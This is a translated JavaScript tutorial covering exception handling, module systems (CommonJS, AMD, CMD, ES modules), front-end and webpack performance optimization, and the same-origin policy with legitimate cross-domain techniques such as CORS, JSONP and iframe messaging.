Preface
This is the last article in the series. It covers some advanced JavaScript topics and reviews the main points. If you are interested, the previous installment, JavaScript Core Knowledge Summary (Part 2), covers functions, scope, closures, prototypes, this, and related topics.
Exception handling
Why handle exceptions
- Improve the user experience;
- Locate problems remotely;
- Be proactive and find problems early;
- Diagnose problems that cannot be reproduced locally, especially on mobile, where device model and system vary;
- Complete the front-end solution with a front-end monitoring system.
Which exceptions need to be handled
- JS syntax errors and runtime code exceptions
- Abnormal AJAX requests
- Static resource loading failures
- Promise exceptions
- Iframe exceptions
- Cross-domain Script error
- Crashes and freezes
Try-catch
Try-catch can catch only synchronous runtime errors; it cannot catch syntax errors or asynchronous errors.
- Synchronous runtime error (can be caught):

try {
  let name = 'jartto';
  console.log(nam);
} catch(e) {
  console.log('Exception caught:', e);
}

Output:

Exception caught: ReferenceError: nam is not defined at <anonymous>:3:15
- Syntax error (cannot be caught)

Let's modify the code to drop a single quote:

try {
  let name = 'jartto;
  console.log(nam);
} catch(e) {
  console.log('Exception caught:', e);
}

Output:

Uncaught SyntaxError: Invalid or unexpected token
- Asynchronous error (cannot be caught)

try {
  setTimeout(() => {
    undefined.map(v => v);
  }, 1000);
} catch(e) {
  console.log('Exception caught:', e);
}

Let's take a look at the log:

Uncaught TypeError: Cannot read property 'map' of undefined
    at setTimeout (<anonymous>:3:11)

No exception was caught, which is something we need to pay special attention to.
window.onerror
When a JS runtime error occurs, the window raises an error event from the ErrorEvent interface and executes window.onerror().
/**
 * @param {String} message error message
 * @param {String} source  URL of the script where the error occurred
 * @param {Number} lineno  line number
 * @param {Number} colno   column number
 * @param {Object} error   Error object
 */
window.onerror = function(message, source, lineno, colno, error) {
  console.log('Exception caught:', {message, source, lineno, colno, error});
}
Exceptions that can be caught:
- Synchronous runtime errors
- Asynchronous runtime errors

Exceptions that cannot be caught:
- Syntax errors
- Request errors
- Static resource errors
This is pretty clear: in practice, window.onerror is mainly used to catch unexpected errors, while try-catch is used to monitor specific errors in predictable situations; combining the two is more efficient.
window.addEventListener
When a resource (such as an image or script) fails to load, the element that was loading the resource raises an error Event, and the onerror() handler on that element is executed. These error events do not bubble up to window, but (at least in Firefox) they can be caught by a window.addEventListener registered in the capture phase.
<script>
window.addEventListener('error', (error) => {
  console.log('Exception caught:', error);
}, true)
</script>
<img src="./jartto.png">
Console output:
Because network request exceptions do not bubble, they must be captured in the capture phase. However, although this method can capture network request exceptions, it cannot determine whether the HTTP status is 404 or other such as 500, so it needs to cooperate with server logs to conduct investigation and analysis.
Promise Catch
Using a catch in a promise makes it very easy to catch an asynchronous error.
Errors thrown in a Promise without a catch cannot be caught by window.onerror or try-catch, so it is important to remember to add a catch to Promises to handle any exceptions thrown.
To prevent missed Promise exceptions, it is recommended to add a global listener on unhandledrejection to globally listen for Uncaught Promise errors. Usage:
window.addEventListener("unhandledrejection", function(e) {
  console.log(e);
});
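A minimal runnable sketch of the two mechanisms together, written for Node.js, where the equivalent global hook is process.on('unhandledRejection'):

```javascript
// A rejection with a .catch() is handled locally; a rejection without one
// reaches the global unhandledRejection hook (Node's counterpart to the
// browser's unhandledrejection event).
const results = [];

process.on('unhandledRejection', (reason) => {
  results.push('global: ' + reason.message);
});

Promise.reject(new Error('handled'))
  .catch((e) => results.push('local: ' + e.message));

Promise.reject(new Error('unhandled')); // no catch: ends up in the global hook
```

In the browser, the same pattern uses the window.addEventListener("unhandledrejection", ...) listener shown above.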
Modularization
CommonJs
The CommonJS API fills this gap by defining the apis used by many common applications, mainly non-browser applications. Its ultimate goal is to provide a standard library similar to Python, Ruby, and Java. That way, developers can use the CommonJS API to write applications that can then run in different JavaScript interpreters and different host environments.
The Node.js module system is implemented with reference to the CommonJS specification. In CommonJS, there is a global method require() for loading modules. For example, to load math.js, you can write:

var math = require('math')
// Then you can call the methods in math
math.add(2, 3) // 5
CommonJS defines a module in terms of:

- Module reference — require — used to import external modules
- Module definition — exports — the methods or variables exported by the current module
- Module identity — module — represents the module itself
CommonJS principle and simple implementation
A simple example
var module = {
  exports: {}
};

(function(module, exports) {
  exports.multiply = function (n) { return n * 1000 };
})(module, module.exports);

var f = module.exports.multiply;
f(5) // 5000
The above code provides module and exports external variables to an immediate function that houses the module. The module’s output is placed in module.exports, which allows the module to be loaded.
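Extending the idea, here is a minimal sketch of how a require() loader could work: each module's source is wrapped in a function, executed once, and its exports cached. The sources registry and the module name math are invented for illustration.

```javascript
// Hypothetical module registry: id -> source string.
const sources = {
  math: 'exports.add = function (a, b) { return a + b; };'
};
const cache = {};

function myRequire(id) {
  if (cache[id]) return cache[id].exports;   // second load: read from cache
  const module = { exports: {} };
  cache[id] = module;                        // cache before running (helps with cycles)
  // Wrap the module source in a function that receives module/exports/require
  const wrapper = new Function('module', 'exports', 'require', sources[id]);
  wrapper(module, module.exports, myRequire);
  return module.exports;
}

const math = myRequire('math');
console.log(math.add(2, 3)); // 5
```

This mirrors what the wrapper pattern above does by hand, plus the caching that real CommonJS loaders perform.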
The realization of the Browserify
Browserify is currently the most commonly used CommonJS format conversion tool.
See an example where the main.js module loads the foo.js module.
// foo.js
module.exports = function(x) {
console.log(x);
};
// main.js
var foo = require("./foo");
foo("Hi");
Using the following command, you can convert main.js into a browser-usable format.
$ browserify main.js > compiled.js
What exactly does Browserify do? Install browser-unpack and you'll see.
$ npm install browser-unpack -g
Then, unpack the previously generated compiled.js.
$ browser-unpack < compiled.js
[
  {
    "id": 1,
    "source": "module.exports = function(x) {\n  console.log(x);\n};",
    "deps": {}
  },
  {
    "id": 2,
    "source": "var foo = require(\"./foo\");\nfoo(\"Hi\");",
    "deps": { "./foo": 1 },
    "entry": true
  }
]
As you can see, Browserify puts all modules into an array: the id attribute is the module number, the source attribute is the module's source code, and the deps attribute lists the module's dependencies.
Since foo.js is loaded in main.js, the deps attribute specifies that./foo corresponds to module 1. The browser executes the source property of module 1 and outputs the value of module.exports when it encounters require(‘./foo’).
AMD
With Node.js following the CommonJS specification, the concept of server-side modules took shape, and naturally people wanted client-side modules too, preferably compatible ones, so that a module could run both on the server and in the browser without modification. However, one major limitation makes the CommonJS specification unsuitable for the browser environment. The code above has a big problem if it runs in a browser. Can you tell?
var math = require('math');
math.add(2, 3);
The second line, math.add(2, 3), runs after the first line, require('math'), so it must wait until math.js has finished loading. That is, if loading takes a long time, the entire application just sits there and waits. You'll notice that require is synchronous.
This is not a problem on the server because all modules are stored on the local hard disk and can be loaded synchronously, and the wait time is the hard disk read time. For browsers, however, this is a big problem because modules are on the server side and the wait time can be long depending on the speed of the network, leaving the browser in a state of “suspended animation”.
Therefore, browser-side modules cannot be synchronous, they can only be asynchronous. This is the background from which the AMD specification was born.
CommonJS was designed mainly around how JS behaves on the back end and is not well suited to the front end. AMD (Asynchronous Module Definition) emerged as a specification aimed mainly at how JS behaves on the front end.
AMD stands for “Asynchronous Module Definition”. It loads modules asynchronously without affecting the execution of subsequent statements. All statements that depend on this module are defined in a callback function that will not run until the load is complete.
AMD also uses the require() statement to load modules, but unlike CommonJS, it requires two arguments:
require([module], callback);
The first argument, [module], is an array whose members are the modules to be loaded. The second argument, callback, is the callback function after the successful loading. If you rewrite the previous code to AMD form, it looks like this:
require(['math'], function (math) {
  math.add(2, 3);
});
Take RequireJS as an example to illustrate the AMD specification
Why require.js?
In the early days, all JavaScript code was written in a single file, and loading that one file was enough. Later, as the amount of code grew, one file was no longer enough; it had to be split into multiple files loaded one after another. The following page code should look familiar to many people.
<script src="1.js"></script>
<script src="2.js"></script>
<script src="3.js"></script>
<script src="4.js"></script>
<script src="5.js"></script>
<script src="6.js"></script>
This code loads multiple JS files in turn.
There are major disadvantages to writing this way. First, when loading, the browser will stop rendering the page, and the more files loaded, the longer the page will be unresponsive. Secondly, due to the dependency relationship between JS files, the loading sequence must be strictly guaranteed (for example, 1.js should be in front of 2.js), and the module with the largest dependency must be loaded last. When the dependency relationship is very complex, the writing and maintenance of the code will become difficult.
Require.js was created to solve these two problems:
1. Implement asynchronous loading of JS files to avoid losing response of web pages
2. Manage the dependency between modules, easy to write and maintain the code
AMD && CMD
For dependent modules, AMD executes early and CMD executes late. Since 2.0, however, RequireJS has also been deferred (handled differently depending on how it is written). CMD advocates as lazy as possible.
CMD advocates dependency nearby, AMD advocates dependency front. Look at the code:
// CMD
define(function(require, exports, module) {
  var a = require('./a')
  a.doSomething()
  // Omit 100 lines here
  var b = require('./b') // Dependencies can be declared close to where they are used
  b.doSomething()
  // ...
})

// AMD's default recommended style
define(['./a', './b'], function(a, b) { // Dependencies must be declared up front
  a.doSomething()
  // Omit 100 lines here
  b.doSomething()
  // ...
})
Although AMD also supports the CMD style and passing require as a dependency, the RequireJS author prefers the form above, and it is the default module definition in the official documentation.
AMD's APIs tend to be multi-purpose (one API used in several ways), while CMD's APIs are strictly differentiated, advocating a single responsibility. For example, in AMD, require is split into a global require and a local require, both called require. In CMD there is no global require; instead, in keeping with the completeness of the module system, seajs.use is provided to load and start the module system. In CMD, every API is simple and pure.
ES6 Module
- export: specifies the module's external interface
  - Default export: export default Person (you can use any name when importing, without knowing the real internal name)
  - Separate export: export const name = "Bruce"
  - Export on demand: export { age, name, sex } (recommended)
  - Rename export: export { name as newName }
- import: imports another module's interface
  - Default import: import Person from "person"
  - Whole-module import: import * as Person from "person"
  - Import on demand: import { age, name, sex } from "person"
  - Rename import: import { name as newName } from "person"
  - Side-effect-only import: import "person"
  - Compound import: import Person, { name } from "person"
- Compound mode: the export and import commands combined in one line. The variables are not imported into the current module; this is equivalent to forwarding the external interface, so the current module cannot use the re-exported variables directly
  - Default import/export: export { default } from "person"
  - Whole-module import/export: export * from "person"
  - Import/export on demand: export { age, name, sex } from "person"
  - Rename import/export: export { name as newName } from "person"
  - Named-to-default import/export: export { name as default } from "person"
  - Default-to-named import/export: export { default as name } from "person"
-
Differences between CommonJS and ESM

- CommonJS outputs a copy of a value; ESM outputs a reference
  - CommonJS: once a value is exported, changes inside the module no longer affect that value
  - ESM: an exported variable stays bound to the module it lives in; when the script actually executes, the read-only reference is resolved in the loaded module
- CommonJS is loaded at run time; ESM is resolved at compile time
  - A CommonJS module loads as an object (module.exports), which is only generated after the script runs
  - An ESM module is not an object; its external interface is a static definition generated during the static parsing phase
Cyclic loading

- Definition: the execution of script A depends on script B, while the execution of script B in turn depends on script A
- Loading principle
  - CommonJS: require() executes the entire script the first time it is loaded, generates an object in memory, and caches it; subsequent loads read directly from the cache
  - ESM: variables loaded by the import command are not cached; they become references into the loaded module
- Handling of cycles
  - CommonJS: only the part that has already executed is exported; the part that has not yet executed is not
  - ESM: the developer must ensure the value is available when it is actually used (e.g. write the variable as a function declaration, which is hoisted)
Performance optimization
The main directions of performance optimization are:

- Writing high-performance JavaScript
- Browser rendering
- Network optimization
- Bundler optimization, taking webpack as an example
Write high-performance JavaScript
Common coding practices:

- Place js scripts at the bottom of the page to speed up rendering
- Package js scripts into groups to reduce requests
- Download js scripts in a non-blocking way
- Use local variables to hold global values where possible
- Follow strict mode: "use strict"
- Use closures sparingly
- Reduce object member nesting
- Cache DOM node access
- Avoid eval() and the Function() constructor
- Create objects and arrays with literals whenever possible
- Minimize repaint and reflow
Why put JS at the end of the body?
If JS needs to bind to the DOM and is placed in the header without special handling, the DOM will not exist yet when the script runs, so the binding fails.
The **JS engine exists independently of the rendering engine. ** Our JS code is executed wherever it is inserted in the document. When the HTML parser encounters a Script tag, it pauses the rendering process and gives control to the JS engine. The JS engine will execute the inline JS code directly, and the external JS file must first get the script, and then execute. Once the JS engine is finished running, the browser will return control to the rendering engine and continue to build CSSOM and DOM.
The browser lets JS block other activities because it doesn’t know what changes JS is going to make, and it’s afraid of chaos if it doesn’t block subsequent operations.
Conclusion:
- If the JS is in the header, the browser blocks and waits for the JS to load and execute
- If JS is at the end of the body, the browser does an early rendering to bring the first screen forward
See the demo at perform/performance optimization/testDemo slowServer/index.js, and pay attention to the terminal output.
Asynchronous loading of non-core code
- Dynamic script loading: use JS to create a script tag and insert it into the page
- defer (originally IE): the script executes only after the entire HTML file has been parsed; with multiple scripts, they execute in load order
- async: the script executes immediately after it finishes loading; with multiple scripts, execution order is independent of load order
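A minimal sketch of the dynamic-loading approach (the function name and URL are illustrative):

```javascript
// Create a script tag from JS and insert it, so the download does not block
// HTML parsing; dependent code runs in the onload callback.
function loadScript(src, callback) {
  var script = document.createElement('script');
  script.src = src;
  script.async = true;       // load without blocking the parser
  script.onload = callback;  // run dependent code only after the script loads
  document.head.appendChild(script);
}
```

Usage: loadScript('//example.com/app.js', function () { /* init code */ });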
The header of the meta
Compatibility configuration: tell IE to render with the highest available Edge document mode, and use Chrome Frame's rendering engine if it is installed.
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
If the browser is dual-core, the WebKit engine is preferred
<meta name="render" content="webkit">
Lazy loading
The principle of lazy loading is to load a resource only when it enters a defined area (usually the visible area, or an area that is about to become visible). For images: set the img tag's src to a placeholder or leave it empty, and put the real image URL in a custom attribute. When the image enters the defined area, copy the custom attribute into src; the browser then downloads the resource, achieving lazy image loading.
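A minimal sketch using IntersectionObserver, assuming images are written as <img src="placeholder.png" data-src="real.png"> (the attribute name data-src is a convention, not a standard):

```javascript
// When an image enters the viewport, copy the real URL from data-src
// into src and stop observing it.
function lazyLoad(images) {
  var observer = new IntersectionObserver(function (entries) {
    entries.forEach(function (entry) {
      if (entry.isIntersecting) {
        var img = entry.target;
        img.src = img.dataset.src;  // trigger the real download
        observer.unobserve(img);    // each image loads only once
      }
    });
  });
  images.forEach(function (img) { observer.observe(img); });
}
```

Usage: lazyLoad(Array.from(document.querySelectorAll('img[data-src]')));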
Browser rendering
HTML is parsed to generate the DOM tree; CSS is parsed to generate style rules; combining the two produces the render tree. Layout then computes the width, height, position, and other display properties of each node, painting draws it on screen, and the user sees the page.
The browser rendering process:
- Parse the HTML to build the DOM tree, requesting css/image/js resources in parallel
- Download the CSS file and build the CSSOM (CSS tree)
- Once the CSSOM is built, combine it with the DOM to generate the render tree
- Layout: calculate the position of each node on the screen
- Paint: draw the page on the screen using the graphics card
DOM tree vs. render tree
- The DOM tree corresponds one-to-one with the HTML tags, including head and hidden elements
- The render tree does not include head or hidden elements; each line of a large block of text is a separate node, and every node has its corresponding css properties
Does CSS block DOM parsing?

For an HTML document, CSS, whether inline or linked, blocks subsequent DOM rendering, but not subsequent DOM parsing.

When the CSS file is placed in <head>, CSS parsing still blocks subsequent DOM rendering, but DOM parsing proceeds in parallel, so the page renders progressively once CSS parsing completes.
What is the difference and relationship between redraw and rearrangement?
- Repaint: occurs when the appearance of elements in the render tree (e.g. color) changes without affecting layout
- Reflow: occurs when the layout of elements in the render tree (e.g. size, position, hidden/shown state) changes
- Note: reading layout property values from JS (e.g. offsetLeft, scrollTop, getComputedStyle()) can also cause reflow, because the browser needs to reflow to compute the latest value
- Reflow always causes a repaint; a repaint does not necessarily cause a reflow
Each element in the DOM structure has its own box, which requires the browser to calculate and place the element in its proper place according to various styles, a process called reflow
Trigger reflow
- Add or remove visible DOM elements.
- Element position changes.
- Changes in the size of an element (including changes in internal and external margins, border thickness, width, height, etc.).
- Content changes.
- The page renderer is initialized.
- Browser window size changed.
Solutions:

- When you need to perform complex operations on a DOM element, hide it first (display: none) and show it again after the operations are complete
- When many DOM nodes must be created, use a DocumentFragment and add it to the document in one go, or build the corresponding HTML by string concatenation and update the page via innerHTML
- Cache layout property values, e.g. var left = el.offsetLeft; using left repeatedly then triggers only one reflow
- Avoid table layouts (one table element triggering reflow causes all the other elements in the table to reflow)
- Avoid CSS expressions, because the value is recalculated on every call (including page load)
- Use CSS shorthand where possible, e.g. border instead of border-width, border-style, and border-color
- Batch style changes: prefer el.className or el.style.cssText over setting el.style properties one by one
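A small sketch of the caching and batching advice above (the element and numbers are illustrative): read the layout value once, then apply all style changes in a single write.

```javascript
function moveRight(el, delta) {
  var left = el.offsetLeft;  // one layout read (may trigger a reflow)
  // One combined write instead of several separate el.style assignments
  el.style.cssText = 'position: absolute; left: ' + (left + delta) + 'px;';
}
```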
Network optimization
Merge resource files to reduce HTTP requests
Browsers limit the number of concurrent HTTP requests (a desktop browser may allow 8 concurrent requests, a mobile browser 6). If dozens of requests fire at once, many of them queue, waiting for earlier requests to finish before they can start, which extends the total page load time.
Compress the resource file to reduce the request size
The smaller the file size, of course, the faster it loads. The code can be compressed to remove whitespace, comments, variable substitutions, and the size of the resource file can also be reduced by using compression methods such as gzip during transfer.
Classification of caches

- Strong cache
  - Read directly from the browser cache without asking the server whether the resource has expired
  - Expires: absolute expiration time
  - Cache-Control: max-age=3600, expiration in seconds
- Negotiated cache
  - Check with the server each time before using the cache
  - Last-Modified / If-Modified-Since: last modification time
  - Etag / If-None-Match: content fingerprint
- How to distinguish: whether no-cache is set
Use the cache mechanism to minimize requests whenever possible
The browser has a caching mechanism. When returning a resource, set a cache-control expiration time. Within the expiration time, the browser uses the local cache by default.
There are problems with caching, however, because web development is release-driven and a new version ships every so often. HTTP requests are located by URL, so if a resource file's URL has not changed, the browser will keep using the cache. What to do? A cache-update mechanism is needed: give a modified file a new name. The simplest way is to append a timestamp to the URL, but then every new release forces all resources to be re-fetched. The popular modern approach is to compute a hash from the file's contents, which changes only when the file changes; when the file name changes, the browser requests the new file.
DNS pre-resolution
Modern browsers do two things on DNS Prefetch:
-
After downloading the HTML source code, it will parse the tag containing the link on the page and query the corresponding domain name in advance
-
For visited pages, the browser keeps a list of domain names and, when opened again, resolves DNS while the HTML is downloaded
Automatic pre-resolution
The browser uses the href attribute of hyperlinks to find host names to pre-resolve. When an a tag is encountered, the browser automatically resolves the domain name in its href to an IP address, in parallel with the user browsing the page. However, for security, there is no automatic pre-resolution on HTTPS pages.
Manual pre-resolution

Pre-resolve a domain name:
<link rel="dns-prefetch" href="//img.alicdn.com">

Force DNS pre-resolution on in HTTPS pages:
<meta http-equiv="x-dns-prefetch-control" content="on">
CDN
The principle of a CDN is to distribute cache servers across as many machine rooms as possible, so data is served from a node close to the user.
Therefore, we can use CDN to load static resources as much as possible. As the browser has the upper limit of concurrent requests for a single domain name, we can consider using multiple CDN domain names. In addition, it is necessary to pay attention to the CDN domain name to be different from that of the master site when loading static resources. Otherwise, each request will bring cookies of the master site and consume traffic in vain.
preload
In development, you might encounter situations like this. You can use preloading when you don’t need resources right away but want them as early as possible.
Preloading is a declarative fetch that forces the browser to request resources and does not block the onload event. You can use the following code to enable preloading.
Preloading can reduce the loading time of the first screen to some extent, because some important files that do not affect the first screen can be loaded later. The only disadvantage is poor compatibility.
<link rel="preload" href="http://example.com">
Pre-rendering
Pre-rendering lets the browser download and render a page in the background before the user navigates to it, so navigation feels instant.
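Pre-rendering is typically enabled with a resource hint along these lines (the URL is a placeholder):

```html
<link rel="prerender" href="http://example.com">
```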
Image optimization
- Avoid images where possible. Many decorative effects that are often done with images can be achieved with CSS instead
- On mobile, there is no need to load the original image; request a cropped/resized version instead
- Inline very small images in base64 format
- Combine multiple icon files into one image (a sprite)
- Use the correct image format
  - For browsers that can display WebP, use WebP as much as possible: its better compression algorithm produces smaller files with image quality that looks identical to the naked eye; the drawback is poorer compatibility
  - Use JPEG for images with many colors
  - Use PNG for images with few colors; some can be replaced with SVG
Optimization of webpack
The main optimization ideas are:

- Ways to reduce Webpack packaging time
- Ways to make the Webpack bundles smaller
Reduce the size of packaged files
Load on demand

If we pack all the pages into a single JS file, we do merge multiple requests, but we also load a lot of code that is not needed yet, which takes longer. To present the home page to the user faster, we want its bundle to be as small as possible; we can use on-demand loading and package each routed page as a separate file.
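A sketch of route-based on-demand loading with dynamic import(), which Webpack turns into separate chunks; the route paths and page modules are invented for illustration.

```javascript
// Each route maps to a function that loads its page module on first visit.
const routes = {
  '/home': () => import(/* webpackChunkName: "home" */ './pages/home.js'),
  '/about': () => import(/* webpackChunkName: "about" */ './pages/about.js')
};

// Load the page chunk only when the user navigates to the route.
function navigate(path) {
  return routes[path]().then((mod) => mod.render());
}
```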
Tree Shaking
Tree Shaking can remove unreferenced code from a project, for example
// test.js
export const a = 1
export const b = 2

// index.js
import { a } from './test.js'
In the case above, if variable b in the test file is not used anywhere in the project, it will not be packaged into the bundle.
If you are using Webpack 4, this optimization is enabled automatically in production mode.
Scope Hoisting
Scope hoisting analyzes the dependencies between modules and merges the packaged modules into as few functions as possible. Let's say we want to package two files:
// test.js
export const a = 1

// index.js
import { a } from './test.js'
In this case, our packaged code would look something like this
[
  /* 0 */
  function (module, exports, require) {
    // ...
  },
  /* 1 */
  function (module, exports, require) {
    // ...
  }
]
However, if we use scope hoisting, the code is merged into one function as far as possible, and it becomes something like this:
[
  /* 0 */
  function (module, exports, require) {
    // ...
  }
]
This packaging approach generates noticeably less code than the previous one. To enable this feature in Webpack 4, just turn on optimization.concatenateModules:

module.exports = {
  optimization: {
    concatenateModules: true
  }
}
Speed up packing
Optimize the Loader
For Loader, Babel is the first to affect packaging efficiency. Because Babel converts code into strings to generate an AST (abstract syntax tree), and then continues to transform the AST to generate new code, the larger the project, the more code it transforms, the less efficient it becomes. Of course, there are ways to optimize.
First, we can reduce the Loader's file search scope:
module.exports = {
  module: {
    rules: [
      {
        // Use Babel for js files
        test: /\.js$/,
        loader: 'babel-loader',
        // Only look in the src folder
        include: [resolve('src')],
        // Paths that will not be searched
        exclude: /node_modules/
      }
    ]
  }
}
You can also cache Babel compiled files so that you only need to compile the changed code files next time, greatly speeding up the packaging time.
loader: 'babel-loader?cacheDirectory=true'
HappyPack
Because Node is single-threaded, Webpack is also single-threaded during packaging; especially during Loader execution, long waits can occur.
HappyPack can convert Loader synchronous execution to parallel, which makes full use of system resources to speed up packaging
module: {
  loaders: [
    {
      test: /\.js$/,
      include: [resolve('src')],
      exclude: /node_modules/,
      // The id corresponds to the plugin configuration below
      loader: 'happypack/loader?id=happybabel'
    }
  ]
},
plugins: [
  new HappyPack({
    id: 'happybabel',
    loaders: ['babel-loader?cacheDirectory'],
    // Start 4 threads
    threads: 4
  })
]
DllPlugin
The DllPlugin can pre-package specific class libraries and import them afterwards. This greatly reduces repackaging: class libraries need to be repackaged only when they are upgraded, and it also achieves the optimization of splitting common code into separate files.
// Configure in a separate file
// webpack.dll.conf.js
const path = require('path')
const webpack = require('webpack')

module.exports = {
  entry: {
    // The class libraries to pre-package together
    vendor: ['react']
  },
  output: {
    path: path.join(__dirname, 'dist'),
    filename: '[name].dll.js',
    library: '[name]-[hash]'
  },
  plugins: [
    new webpack.DllPlugin({
      // name must match output.library
      name: '[name]-[hash]',
      // context must be consistent with the DllReferencePlugin
      context: __dirname,
      path: path.join(__dirname, 'dist', '[name]-manifest.json')
    })
  ]
}
We then need to execute this configuration file to generate the dependency files, which we then need to introduce into the project using the DllReferencePlugin
// webpack.conf.js
module.exports = {
  // ... other configuration omitted
  plugins: [
    new webpack.DllReferencePlugin({
      context: __dirname,
      // manifest is the json file generated by the previous packaging step
      manifest: require('./dist/vendor-manifest.json')
    })
  ]
}
Code compression
In Webpack 3, we generally use UglifyJS to compress code, but it runs single-threaded. To speed things up, we can use webpack-parallel-uglify-plugin to run UglifyJS in parallel and improve efficiency.
In Webpack 4 we no longer need to do this: just set mode to 'production' and compression is enabled by default. Code compression is a performance optimization we must do; besides JS we can also compress HTML and CSS, and while compressing JS we can configure the minifier to strip calls such as console.log.
Some small optimization points
- resolve.extensions: the list of file suffixes tried when an imported file has no extension; the default search order is ['.js', '.json']. Keep the list as short as possible and put the most frequent suffixes first
- resolve.alias: map a path to an alias so Webpack can locate it faster
- module.noParse: if you are sure a file has no other dependencies, use this property to keep Webpack from scanning it, which is useful for large libraries
Web security
Common security problems on the Web are as follows:
- The same-origin policy
- XSS cross-site scripting attacks
- CSRF cross-site request forgery
The same-origin policy
Originally, it meant that a Cookie set by page A cannot be read by page B unless the two pages have the same origin. "Same origin" means all three of the following match:
- The agreement is the same
- Domain name is the same
- The same port
purpose
The purpose of the same origin policy is to ensure the security of user information and prevent malicious websites from stealing data.
Consider this situation: website A is a bank. A user logs in, then visits another website. What happens if that other website can read website A's cookies?
Obviously, if a Cookie contains private data (such as the account balance), that information is leaked. Worse, cookies are often used to store the user's login state: if the user has not logged out, another website can impersonate the user and do whatever it wants, because browsers additionally allow form submissions to cross origins.
Therefore, the same origin policy is necessary, otherwise cookies can be shared and the Internet is not safe at all.
limits
(1) Cookies, LocalStorage, and IndexedDB cannot be read.
(2) DOM cannot be obtained.
(3) AJAX requests cannot be sent.
Cross-domain solutions
- CORS
- JSONP
- document.domain+iframe
- location.hash+iframe
- window.name+iframe
- postMessage
- WebSocket
- Node middleware
- Nginx proxy
CORS Cross-domain resource request
Cross-Origin Resource Sharing (CORS).
When the browser makes a cross-domain Ajax request, it adds an `Origin` field to the request header, since it cannot know in advance whether the server allows the cross-origin request. The request is sent to the server; if the response header does not contain an `Access-Control-Allow-Origin` matching the page's origin (or `*`), the browser discards the response and reports an error in the console.
CORS limit
Allowed request methods:

- GET
- POST
- HEAD

Allowed `Content-Type` values:

- text/plain
- multipart/form-data
- application/x-www-form-urlencoded

Requests with other methods or Content-Types must pass a preflight check before being sent.
CORS preflight requests
The Cross-Origin Resource Sharing standard adds a set of HTTP header fields that let servers declare which origins may access which resources. In addition, the specification requires that for HTTP request methods that may have side effects on server data (in particular, methods other than GET, or POST with certain MIME types), the browser must first send a preflight request using the OPTIONS method.
Once the server has whitelisted the method and Content-Type in its response headers, requests using those methods and Content-Types can succeed:

```
'Access-Control-Allow-Headers': 'Content-Type',   // extra headers to allow
'Access-Control-Allow-Methods': '...',            // extra methods to allow
'Access-Control-Max-Age': '...'                   // how long the preflight result may be cached
```
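Server-side, the decision can be sketched as a small helper that returns the CORS response headers for a whitelisted origin (`corsHeaders` is an illustrative helper, not part of any library):

```javascript
// Hypothetical helper: given the request's Origin and a whitelist,
// return the CORS headers the server should set (empty = origin rejected).
function corsHeaders(origin, whitelist) {
  if (!whitelist.includes(origin)) {
    return {}; // not allowed: no CORS headers, so the browser blocks the response
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Methods': 'GET, POST, PUT, DELETE',
    'Access-Control-Allow-Headers': 'Content-Type',
    'Access-Control-Max-Age': '86400' // cache the preflight result for a day
  };
}
```

A real server would set these headers on the OPTIONS (preflight) response as well as on the actual response.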
The json cross-domain
Browsers enforce same-origin restrictions, but they allow tags such as `script`, `link`, `img`, and `iframe` to load resources cross-domain via their `src` (or `href`) address.
So the principle of JSONP is:

- Create a `script` tag whose `src` is the request address;
- Insert the `script` tag into the `DOM`; the browser fetches the server resource at the `src` address;
- The resource that comes back is plain text, but because it sits inside a script tag, the browser executes it;
- That text has the form of a function call, `functionName(data)`, which the browser runs as JS code, invoking the function;
- As long as the function name is agreed on in advance and the function exists on the `window` object, the data is passed to the handler.
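As a sketch of the server side of this handshake, the response body is simply the agreed callback name wrapped around the data (`jsonpBody` is an illustrative helper, not from any library):

```javascript
// Hypothetical server-side helper: wrap the payload in a call to the
// callback name agreed with the client.
function jsonpBody(callbackName, data) {
  return callbackName + '(' + JSON.stringify(data) + ')';
}

// The browser receives e.g.  onCallback({"user":"admin"})  inside a <script>
// tag and executes it, invoking window.onCallback with the data.
```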
document.domain+iframe
The primary domain must be the same and the subdomains must be different
The parent window: www.domain.com/a.html
<iframe id="iframe" src="http://child.domain.com/b.html"></iframe>
<script>
document.domain = 'domain.com';
var user = 'admin';
</script>
Child window: child.domain.com/b.html
<script>
document.domain = 'domain.com';
// Get the variables in the parent window
alert('get js data from parent ---> ' + window.parent.user);
</script>
location.hash + iframe
Implementation principle: page A wants to communicate across domains with page B, and does so through an intermediate page C. Between the three pages, different-domain pairs pass values via the iframe's `location.hash`, while same-domain pairs communicate directly through JS.
Domain A: a.html -> domain B: b.html -> domain A: c.html. A and B are in different domains and can only communicate one-way via the hash; B and C are also in different domains and likewise one-way; but C and A share a domain, so C can reach every object on page A through `parent.parent`.
1.) A.HTML (www.domain1.com/a.html)
<iframe id="iframe" src="http://www.domain2.com/b.html" style="display:none;"></iframe>
<script>
var iframe = document.getElementById('iframe');
// Pass hash values to B.html
setTimeout(function() {
iframe.src = iframe.src + '#user=admin';
}, 1000);
// callback method exposed to the same-origin c.html
function onCallback(res) {
alert('data from c.html ---> ' + res);
}
</script>
2.) B.HTML (www.domain2.com/b.html)
<iframe id="iframe" src="http://www.domain1.com/c.html" style="display:none;"></iframe>
<script>
var iframe = document.getElementById('iframe');
// listen for hash values from A.html and pass them to C.HTML
window.onhashchange = function () {
iframe.src = iframe.src + location.hash;
};
</script>
3.) C. HTML (www.domain1.com/c.html)
<script>
// Listen for hash values from B.html
window.onhashchange = function () {
// Return the result by manipulating the javascript callback of the same domain A.html
window.parent.parent.onCallback('hello: ' + location.hash.replace('#user='.' '));
};
</script>
window.name + iframe
The window.name attribute is unique in that the name value persists across different pages (and even different domain names) and supports very long name values (2MB).
1.) A.HTML (www.domain1.com/a.html)
```js
var proxy = function(url, callback) {
  var state = 0;
  var iframe = document.createElement('iframe');

  // Load the cross-domain page
  iframe.src = url;

  // onload fires twice; the first time the cross-domain page loads
  // and stores its data in window.name
  iframe.onload = function() {
    if (state === 1) {
      // Second onload (same-domain proxy page) succeeded:
      // read the data from the now same-domain window.name
      callback(iframe.contentWindow.name);
      destroyFrame();
    } else if (state === 0) {
      // First onload succeeded: switch to the same-domain proxy page
      iframe.contentWindow.location = 'http://www.domain1.com/proxy.html';
      state = 1;
    }
  };

  document.body.appendChild(iframe);

  // Once the data has been read, destroy the iframe to free memory;
  // this also ensures security (frame JS from other domains cannot access it)
  function destroyFrame() {
    iframe.contentWindow.document.write('');
    iframe.contentWindow.close();
    document.body.removeChild(iframe);
  }
};

// Request data from the cross-domain page b.html
proxy('http://www.domain2.com/b.html', function(data) {
  alert(data);
});
```
